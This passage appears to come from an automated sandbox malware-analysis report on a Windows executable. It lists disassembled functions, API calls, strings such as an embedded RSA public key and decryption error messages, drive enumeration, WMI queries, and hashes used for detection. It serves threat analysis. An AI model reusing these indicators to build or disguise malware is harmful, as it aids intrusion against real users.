                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00412D27
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00412D2A
                                                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00412D3A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc$CurrentInfoProcessSystemVersion_memset
                                                                                                                                                • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                                                                                • API String ID: 558052023-3073145729
                                                                                                                                                • Opcode ID: 23d6fbb350604dc7212e297aebc434d0d5c7eb109188bb6bd2bb609c01d4a731
                                                                                                                                                • Instruction ID: d3164b67d64a1ba022f1cdfd4cb0083e574330498a52c7d27fbd05e85a333baa
                                                                                                                                                • Opcode Fuzzy Hash: 23d6fbb350604dc7212e297aebc434d0d5c7eb109188bb6bd2bb609c01d4a731
                                                                                                                                                • Instruction Fuzzy Hash: 6A41C3719003099BDB20CF65EA44BFEB7F4AF14305F20481AE646E2290E7BCDAD5DB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00412872, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 104COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _fprintf.LIBCMT ref: 004128A4
                                                                                                                                                • _fprintf.LIBCMT ref: 00412902
                                                                                                                                                • _strlen.LIBCMT ref: 0041291D
                                                                                                                                                  • Part of subcall function 00412996: _malloc.LIBCMT ref: 004129F8
                                                                                                                                                  • Part of subcall function 00412996: _printf.LIBCMT ref: 00412A0C
                                                                                                                                                  • Part of subcall function 00412996: _memset.LIBCMT ref: 00412A1C
                                                                                                                                                  • Part of subcall function 00412996: _memset.LIBCMT ref: 00412A41
                                                                                                                                                  • Part of subcall function 00412996: _strrchr.LIBCMT ref: 00412A5A
                                                                                                                                                • _strlen.LIBCMT ref: 0041292E
                                                                                                                                                • _malloc.LIBCMT ref: 0041293C
                                                                                                                                                  • Part of subcall function 0048E3A3: __FF_MSGBANNER.LIBCMT ref: 0048E3C6
                                                                                                                                                  • Part of subcall function 0048E3A3: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004994D0,0049AF7A,00000001,00000001,00499DC5,00000018,00500298,0000000C,00499E54,00000001), ref: 0048E41B
                                                                                                                                                • _fprintf.LIBCMT ref: 00412968
                                                                                                                                                Strings
                                                                                                                                                • Load Public Key Error!, xrefs: 00412896
                                                                                                                                                • -----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL, xrefs: 0041287F
                                                                                                                                                • Failed to decrypt., xrefs: 0041295A
                                                                                                                                                • %s%s%s, xrefs: 004128F4
                                                                                                                                                • load public key failed[, xrefs: 004128EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _fprintf$_malloc_memset_strlen$AllocHeap_printf_strrchr
                                                                                                                                                • String ID: %s%s%s$-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL$Failed to decrypt.$Load Public Key Error!$load public key failed[
                                                                                                                                                • API String ID: 83560530-3786281172
                                                                                                                                                • Opcode ID: b3de269673a2d88b55db124ecf45c21d9fb690946513600749562b357f5ee6e2
                                                                                                                                                • Instruction ID: b581232947f44ecb0e4fcd872eba601a2a8f6c184df0fc1422fdf5312542f7b8
                                                                                                                                                • Opcode Fuzzy Hash: b3de269673a2d88b55db124ecf45c21d9fb690946513600749562b357f5ee6e2
                                                                                                                                                • Instruction Fuzzy Hash: C421E8F2D042183EDB1077B6AC83EEE6A9D8B01768F20467FF404E2193EDAC9E80415D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041E22C, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 85stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000000,00000206,00000000), ref: 0041E254
                                                                                                                                                • lstrcmpiW.KERNEL32(?,A:\), ref: 0041E284
                                                                                                                                                • lstrcmpiW.KERNEL32(?,B:\), ref: 0041E290
                                                                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041E2B8
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0041E2C6
                                                                                                                                                • __wcsnicmp.LIBCMT ref: 0041E2D7
                                                                                                                                                • lstrcpyW.KERNEL32 ref: 0041E2FF
                                                                                                                                                • lstrcpyW.KERNEL32 ref: 0041E318
                                                                                                                                                • lstrcatW.KERNEL32(?,00000000), ref: 0041E325
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                • String ID: A:\$B:\
                                                                                                                                                • API String ID: 950920757-1009255891
                                                                                                                                                • Opcode ID: 74a82f8f36d1ce249537adfdb1a2663e2d96a3f99fbacc3361bbacbe819b6f20
                                                                                                                                                • Instruction ID: 4808fe8f2782b36c54014319f215b8e2ba82bdd6c51a4d7a72c4565a4145858a
                                                                                                                                                • Opcode Fuzzy Hash: 74a82f8f36d1ce249537adfdb1a2663e2d96a3f99fbacc3361bbacbe819b6f20
                                                                                                                                                • Instruction Fuzzy Hash: 30312C7690030D9ADB60DFA2DC44AEE37BCAF44341F158026FD29D3150E734DA45CBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004140D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004140D9
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004140F5
                                                                                                                                                • CoCreateInstance.OLE32(004F86A4,00000000,00000001,004F85D4,?,00000000,00000000), ref: 0041411C
                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0041418C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BlanketCreateH_prologInitializeInstanceProxy
                                                                                                                                                • String ID: Caption$SELECT Caption FROM Win32_SoundDevice$WQL
                                                                                                                                                • API String ID: 1029552860-4200340773
                                                                                                                                                • Opcode ID: 24bb946418d3bb363a1eefe25ce0528d0522c327a9cc52e5474e734d251cac45
                                                                                                                                                • Instruction ID: 9b48da570da70a6b2613f76d511bf0da1c279102ff6286dca5f2ccf804418d14
                                                                                                                                                • Opcode Fuzzy Hash: 24bb946418d3bb363a1eefe25ce0528d0522c327a9cc52e5474e734d251cac45
                                                                                                                                                • Instruction Fuzzy Hash: 57514D71A01219EFCB10DF95C8889EEBB79FF85B54F20445AF511FB290C7789981CBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B84B2, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,004AC0F2,?,00000000), ref: 004B84B6
                                                                                                                                                • _strncpy.LIBCMT ref: 004B84ED
                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,?,00000000,?,000000FF,00000000,?,?,?,?,004AC0F2,?,00000000), ref: 004B8513
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004B8526
                                                                                                                                                • _strrchr.LIBCMT ref: 004B8538
                                                                                                                                                • _strrchr.LIBCMT ref: 004B8551
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,004AC0F2,?,00000000), ref: 004B8567
                                                                                                                                                • SetLastError.KERNEL32(004AC0F2,?,?,?,004AC0F2,?,00000000), ref: 004B8577
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_strrchr$FormatMessage__fprintf_l_strncpy
                                                                                                                                                • String ID: Unknown error %d (%#x)
                                                                                                                                                • API String ID: 3050962067-2414550090
                                                                                                                                                • Opcode ID: 8b9691d4dbd458cf98c7d9d98f5b0e93ffb79a90828d18345cba8139ea26e077
                                                                                                                                                • Instruction ID: fff0375afece4af9e06a990da95d0060fd5bdb52492a0a2e77ef9517b1601e9a
                                                                                                                                                • Opcode Fuzzy Hash: 8b9691d4dbd458cf98c7d9d98f5b0e93ffb79a90828d18345cba8139ea26e077
                                                                                                                                                • Instruction Fuzzy Hash: C521F0612452457EDA212A36AC45EBF7F8CDF8675EF15403FF40586282ED2E9940C27A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0044B000, Relevance: 12.6, Strings: 10, Instructions: 116COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,name:$,value:$.\crypto\x509v3\v3_utl.c$FALSE$TRUE$YES$false$section:$true$yes
                                                                                                                                                • API String ID: 0-4278224470
                                                                                                                                                • Opcode ID: 831ca4bbbf7c0b37a35e143069e82e8213d7c8306a35b788627647294b8fcf30
                                                                                                                                                • Instruction ID: 00e2d758610c92157541e325575411fe4c2d7a91dcd45af17fa2a0e1fb928e26
                                                                                                                                                • Opcode Fuzzy Hash: 831ca4bbbf7c0b37a35e143069e82e8213d7c8306a35b788627647294b8fcf30
                                                                                                                                                • Instruction Fuzzy Hash: C5315C62B001986BF764C92B99657332687D7C43A2F1DC177A6089B3C5EB688C4253A8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004023F0, Relevance: 10.6, APIs: 7, Instructions: 111libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004023F5
                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 0040242D
                                                                                                                                                • FindResourceW.KERNEL32(00000000,?,?), ref: 0040244F
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00402543
                                                                                                                                                  • Part of subcall function 004040F6: GetLastError.KERNEL32(004010A5), ref: 004040F6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$ErrorFindFreeH_prologLastLoadResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3353779945-0
                                                                                                                                                • Opcode ID: 95f8fa3276995f74aba93b4a754303e46bf23b9ae9d710efc0eaed3eba7ff277
                                                                                                                                                • Instruction ID: fa133fae183ef9fc174c46e36dc03bff0345d5a1b13c1964a3e9479f3909eaa2
                                                                                                                                                • Opcode Fuzzy Hash: 95f8fa3276995f74aba93b4a754303e46bf23b9ae9d710efc0eaed3eba7ff277
                                                                                                                                                • Instruction Fuzzy Hash: EA4186B1900119EBCB10DF64CE49A9E7BB8EB48355F50447BF505B22D2D7B88E41CBAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004143EA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,#{ad498944-762f-11d0-8dcb-00c04fc3358c},?,7FFFFFFE,00000007,00000000,?), ref: 00414469
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00414494
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004144D1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                • String ID: #{ad498944-762f-11d0-8dcb-00c04fc3358c}$%02X$\\.\
                                                                                                                                                • API String ID: 33631002-1280425602
                                                                                                                                                • Opcode ID: 722c42ab405a57c2a772480af8c9ec014f40dddbed95defa20a6080d0ea5b0c7
                                                                                                                                                • Instruction ID: b54b68fc39b668ebf3372720784ddcbe6a75180f3625ca0efe6e179d43352c24
                                                                                                                                                • Opcode Fuzzy Hash: 722c42ab405a57c2a772480af8c9ec014f40dddbed95defa20a6080d0ea5b0c7
                                                                                                                                                • Instruction Fuzzy Hash: 4A21F675A4011CBECB20AFA5DC84EEE7778EB80314F208167F925E71D0D6784A85CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004AE4BE, Relevance: 5.3, Strings: 3, Instructions: 1511COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0$CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!$identity
                                                                                                                                                • API String ID: 0-4198463984
                                                                                                                                                • Opcode ID: ff15d41181a33d2025563d0d7774b58692668852ed6e1cb0b3400d59ecf7c958
                                                                                                                                                • Instruction ID: 8de3023caef2b36139e213c512e6e31edc526f7cf4c79fb9412f4cbf187cabed
                                                                                                                                                • Opcode Fuzzy Hash: ff15d41181a33d2025563d0d7774b58692668852ed6e1cb0b3400d59ecf7c958
                                                                                                                                                • Instruction Fuzzy Hash: 8DD26E74600206DFCB05CF6AC484AA93BA1FF2A344F24847BE91B8F351D739A946DF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0044E710, Relevance: 4.8, APIs: 3, Instructions: 321COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 56b9fbc62323cc0d91b456c8bb4ad1ca2aafccc112fde417de8ebcf7fe43d41f
                                                                                                                                                • Instruction ID: 592b4e3213883bcb3bd9bd85f713344f7c0928d1a9f102dc46958a4852684957
                                                                                                                                                • Opcode Fuzzy Hash: 56b9fbc62323cc0d91b456c8bb4ad1ca2aafccc112fde417de8ebcf7fe43d41f
                                                                                                                                                • Instruction Fuzzy Hash: BBB1903660E7C18FC31EC62D8C8525A6F52AFE320479EC59CC8819F79BC46AE819D771
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0044E3A0, Relevance: 4.6, APIs: 3, Instructions: 144COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 032ff97260e70db766de6c2b47658c5d67f969f001b137187d31d07779f0e337
                                                                                                                                                • Instruction ID: 9d70cd307622b6c42adf0fefb74e928220412501ed73f6808c9d8f0e30495972
                                                                                                                                                • Opcode Fuzzy Hash: 032ff97260e70db766de6c2b47658c5d67f969f001b137187d31d07779f0e337
                                                                                                                                                • Instruction Fuzzy Hash: 2941D772A0D3C15FC30A872A8C8165A7F52AFA3208B4E859CDC849F787C56AF854D7B1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0048E010, Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetThreadLocale.KERNEL32 ref: 0048E023
                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0048E035
                                                                                                                                                • GetACP.KERNEL32 ref: 0048E05E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232894706-0
                                                                                                                                                • Opcode ID: 646afb26f0c6f1ab0bdc8cef265b2432cef51ab5db699b3923b71377fc4fccb9
                                                                                                                                                • Instruction ID: eab2dd2b2ec6968711c27c544392b5da0a6a3c615cdf34063db2ab4427336241
                                                                                                                                                • Opcode Fuzzy Hash: 646afb26f0c6f1ab0bdc8cef265b2432cef51ab5db699b3923b71377fc4fccb9
                                                                                                                                                • Instruction Fuzzy Hash: EEF0FC32E002389BDB25AF759C15AEF77E4BF05B04B0145ADD841F7350D6746D0987C8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406012, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 610COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
